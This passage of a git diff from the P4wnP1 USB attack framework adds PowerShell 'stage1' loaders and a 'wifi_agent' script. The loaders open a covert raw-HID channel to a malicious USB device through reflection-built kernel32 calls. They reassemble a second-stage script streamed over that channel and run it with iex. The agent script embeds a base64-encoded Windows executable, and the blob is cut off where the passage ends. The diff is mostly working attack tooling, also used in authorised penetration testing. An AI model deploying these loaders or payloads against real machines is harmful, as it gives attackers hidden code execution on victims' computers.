+ $dst = $r[$i++]
+ $snd = $r[$i++]
+ $rcv = $r[$i++]
+
+
+ $msg = New-Object Byte[] ($snd)
+ [Array]::Copy($r, $i, $msg, 0, $snd)
+ return $src, $dst, $snd, $rcv, $msg
+}
+
+function GetDevicePath($USB_VID, $USB_PID)
+{
+ $HIDGuid="{4d1e55b2-f16f-11cf-88cb-001111000030}"
+ foreach ($wmidev in gwmi Win32_USBControllerDevice |%{[wmi]($_.Dependent)} ) {
+ #[System.Console]::WriteLine($wmidev.PNPClass)
+ if ($wmidev.DeviceID -match ("$USB_VID" + '&PID_' + "$USB_PID") -and $wmidev.DeviceID -match ('HID') -and -not $wmidev.Service) {
+ $devpath = "\\?\" + $wmidev.PNPDeviceID.Replace('\','#') + "#" + $HIDGuid
+ }
+ }
+ $devpath
+}
+
+#######
+# Init RAW HID device
+#########
+
+# Use Reflection to create [MaMe82]::CreateFile from kernel32.dll
+$mmcl = ReflectCreateFileMethod
+
+$path= GetDevicePath $USB_VID $USB_PID
+# create FileStream to device
+$devfile = CreateFileStreamFromDevicePath $mmcl $path
+$count = -1
+$stage2 = ""
+
+$empty = New-Object Byte[] (0)
+try
+{
+ while ($devfile.SafeFileHandle -ne $null)
+ {
+
+ send_data $devfile 0 0 $empty 0
+ $packet = read_data $devfile
+ if ($packet[0] -ne 0)
+ {
+ break # src not 0, no heartbeat (carying stage2)
+ }
+ if ($packet[1] -ne 0)
+ {
+ break # dst not 0, no heartbeat (carying stage2)
+ }
+ $utf8 = [Text.Encoding]::UTF8.GetString($packet[4])
+ if ($utf8.StartsWith("end_heartbeat") -and ($count -gt 0))
+ {
+ break
+ }
+ if ($utf8.StartsWith("begin_heartbeat"))
+ {
+ $count = 0
+ [Console]::WriteLine("Start receiving stage2")
+ }
+ elseif ($count -ge 0)
+ {
+ # belongs to stream, assemble
+ $stage2 += $utf8
+ $count += 1
+ [Console]::Write(".")
+ }
+ }
+ [Console]::WriteLine("stage2 reassembled")
+ iex $stage2
+}
+finally
+{
+ # end main thread
+ $devfile.Close()
+ $devfile.Dispose()
+}
\ No newline at end of file
diff --git a/hidtools/payload_delivery/stage1_test.ps1 b/hidtools/payload_delivery/stage1_test.ps1
new file mode 100644
index 0000000..aa7cd97
--- /dev/null
+++ b/hidtools/payload_delivery/stage1_test.ps1
@@ -0,0 +1,246 @@
+
+# This file is part of P4wnP1.
+#
+# Copyright (c) 2017, Marcus Mengs.
+#
+# P4wnP1 is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# P4wnP1 is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with P4wnP1. If not, see .
+
+
+# P4wnP1 HID Script
+$USB_VID="1D6B"
+$USB_PID="0137"
+
+function ReflectCreateFileMethod()
+{
+ $Domain = [AppDomain]::CurrentDomain
+ $DynAssembly = New-Object System.Reflection.AssemblyName("MaMe82DynAssembly")
+ $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule("MaMe82DynModule", $False)
+ $TypeBuilder = $ModuleBuilder.DefineType("MaMe82", "Public, Class")
+ # Define the CreateFile Method
+ $CreateFileMethod = $TypeBuilder.DefineMethod(
+ "CreateFile", # Method Name
+ [System.Reflection.MethodAttributes] "Public, Static", # Method Attributes
+ [IntPtr], # Method Return Type
+ [Type[]] @(
+ [String], # lpFileName
+ [Int32], # dwDesiredAccess
+ [UInt32], # dwShareMode
+ [IntPtr], # SecurityAttributes
+ [UInt32], # dwCreationDisposition
+ [UInt32], # dwFlagsAndAttributes
+ [IntPtr] # hTemplateFile
+ ) # Method Parameters
+ )
+
+ # Import DLL
+ $CreateFileDllImport = [System.Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
+
+ # Define Fields
+ $CreateFileFieldArray = [System.Reflection.FieldInfo[]] @(
+ [System.Runtime.InteropServices.DllImportAttribute].GetField("EntryPoint"),
+ [System.Runtime.InteropServices.DllImportAttribute].GetField("PreserveSig"),
+ [System.Runtime.InteropServices.DllImportAttribute].GetField("SetLastError"),
+ [System.Runtime.InteropServices.DllImportAttribute].GetField("CallingConvention"),
+ [System.Runtime.InteropServices.DllImportAttribute].GetField("CharSet")
+ )
+
+ # Define Values for the fields
+ $CreateFileFieldValueArray = [Object[]] @(
+ "CreateFile",
+ $True,
+ $True,
+ [System.Runtime.InteropServices.CallingConvention]::Winapi,
+ [System.Runtime.InteropServices.CharSet]::Auto
+ )
+
+ # Create a Custom Attribute and add to our Method
+ $CreateFileCustomAttribute = New-Object System.Reflection.Emit.CustomAttributeBuilder(
+ $CreateFileDllImport,
+ @("kernel32.dll"),
+ $CreateFileFieldArray,
+ $CreateFileFieldValueArray
+ )
+ $CreateFileMethod.SetCustomAttribute($CreateFileCustomAttribute)
+
+ # Create the Type within our Module
+ #$MaMe82 = $TypeBuilder.CreateType()
+ $TypeBuilder.CreateType()
+}
+
+function CreateFileStreamFromDevicePath($MaMe82Class, [String] $path)
+{
+ # CreateFile method has to be built in [MaMe82]::CreateFile()
+ # call ReflectCreateFileMethod to achieve this
+
+ # Call CreateFile for given devicepath
+ # (GENERIC_READ | GENERIC_WRITE) = 0XC0000000
+ # FILE_FLAG_OVERLAPPED = 0x40000000;
+ $handle = $MaMe82Class::CreateFile($path, [System.Int32]0XC0000000, [System.IO.FileAccess]::ReadWrite, [System.IntPtr]::Zero, [System.IO.FileMode]::Open, [System.UInt32]0x40000000, [System.IntPtr]::Zero)
+
+ # Create SafeFileHandle from file
+ # Note: [Microsoft.Win32.SafeHandles.SafeFileHandle]::new() isn't accessible on PS 2.0 / NET2.0
+ # thus we use reflection to construct FileStream
+ #$shandle = [Microsoft.Win32.SafeHandles.SafeFileHandle]::new($devicefile, [System.Boolean]0)
+ $a = $handle, [Boolean]0
+ $c=[Microsoft.Win32.SafeHandles.SafeFileHandle].GetConstructors()[0]
+ $shandle = $c.Invoke($a)
+
+ # Create filestream from SafeFileHandle
+ #$Device = [System.IO.FileStream]::new($shandle, [System.IO.FileAccess]::ReadWrite, [System.UInt32]32, [System.Boolean]1)
+ # Note: again Reflection has to be used to access the constructor of FileStream
+ $fa=[System.IO.FileAccess]::ReadWrite
+ $a=$shandle, $fa, [System.Int32]64, [System.Boolean]1
+ $c=[System.IO.FileStream].GetConstructors()[14]
+ $Device = $c.Invoke($a)
+
+
+ return $Device
+}
+
+function send_data($file, $source, $dest, $data, $received)
+{
+ $report_id = [byte] 0
+ $src = [byte] $source
+ $dst = [byte] $dest
+ $snd = [byte] $data.Length
+ $rcv = [byte] $received
+
+ $i=0
+ $bytes = New-Object Byte[] (65)
+ $bytes[$i++] = $report_id
+ $bytes[$i++] = $src
+ $bytes[$i++] = $dst
+ $bytes[$i++] = $snd
+ $bytes[$i++] = $rcv
+
+ $data.CopyTo($bytes, $i)
+
+ $devfile.Write($bytes, 0, $bytes.Length)
+
+
+}
+
+function read_data($file)
+{
+ $r = New-Object Byte[] (65)
+ $cr = $devfile.Read($r,0,65)
+
+ # async read able to send heartbeats, which isn't needed anymore
+ #$asyncReadResult = $devfile.BeginRead($r, 0, 65, $null, $null)
+ #while (-not $asyncReadResult.IsCompleted)
+ #{
+ # # Sending heartbeat data if needed, heartbeat otherwise
+ # $heartbeat = New-Object Byte[] (0)
+ # #send_data $devfile 0 0 $heartbeat 0
+ #}
+ #$cr = $devfile.EndRead($asyncReadResult)
+
+ $i=0
+ $report_id = $r[$i++]
+ $src = $r[$i++]
+ $dst = $r[$i++]
+ $snd = $r[$i++]
+ $rcv = $r[$i++]
+
+
+ $msg = New-Object Byte[] ($snd)
+
+ [Array]::Copy($r, $i, $msg, 0, $snd)
+
+
+ # msg
+ return $src, $dst, $snd, $rcv, $msg
+}
+
+function GetDevicePath($USB_VID, $USB_PID)
+{
+ $HIDGuid="{4d1e55b2-f16f-11cf-88cb-001111000030}"
+ foreach ($wmidev in gwmi Win32_USBControllerDevice |%{[wmi]($_.Dependent)} ) {
+ #[System.Console]::WriteLine($wmidev.PNPClass)
+ if ($wmidev.DeviceID -match ("$USB_VID" + '&PID_' + "$USB_PID") -and $wmidev.DeviceID -match ('HID') -and -not $wmidev.Service) {
+ $devpath = "\\?\" + $wmidev.PNPDeviceID.Replace('\','#') + "#" + $HIDGuid
+ }
+ }
+ $devpath
+}
+
+
+
+#######
+# Init RAW HID device
+#########
+
+# Use Reflection to create [MaMe82]::CreateFile from kernel32.dll
+$MaMe82Class = ReflectCreateFileMethod
+
+$path= GetDevicePath $USB_VID $USB_PID
+# create FileStream to device
+$devfile = CreateFileStreamFromDevicePath $MaMe82Class $path
+$count = -1
+$stage1 = ""
+
+try
+{
+ while ($devfile.SafeFileHandle -ne $null)
+ {
+ $heartbeat = New-Object Byte[] (0)
+ send_data $devfile 0 0 $heartbeat 0
+
+ $packet = read_data $devfile
+ # set RCV to SND to acknowledge full packet in next send
+ $src = $packet[0]
+ $dst = $packet[1]
+ $snd = $packet[2]
+ $rcv = $packet[3]
+ $msg = $packet[4]
+
+ $utf8 = [System.Text.Encoding]::UTF8.GetString($msg)
+
+
+ if ($utf8.StartsWith("end_heartbeat") -and ($count -gt 0))
+ {
+ [System.Console]::WriteLine("Received last package of stage1")
+
+ break
+ }
+ if ($utf8.StartsWith("begin_heartbeat"))
+ {
+ $count = 0
+ [System.Console]::WriteLine("Received first package of stage1")
+ }
+ elseif ($count -ge 0)
+ {
+ # belongs to stream, assemble
+ $stage1 += $utf8
+ $count += 1
+ [System.Console]::WriteLine("Received package $count of stage1")
+ }
+
+
+ }
+ [System.Console]::WriteLine("stage2 reassembled")
+ #[System.Console]::WriteLine("$stage1")
+
+ #$stage2 = Get-Content stage2.ps1 | Out-String # we load stage 2 from disk
+ $stage2 = Get-Content stage2_2.ps1 | Out-String # we load stage 2 from disk
+ "$stage2"
+ iex $stage2
+}
+finally
+{
+ # end main thread
+ $devfile.Close()
+ $devfile.Dispose()
+}
\ No newline at end of file
diff --git a/hidtools/payload_delivery/wifi_agent.ps1 b/hidtools/payload_delivery/wifi_agent.ps1
new file mode 100644
index 0000000..7b1ac95
--- /dev/null
+++ b/hidtools/payload_delivery/wifi_agent.ps1
@@ -0,0 +1,4 @@
+$srvID=9
+$s="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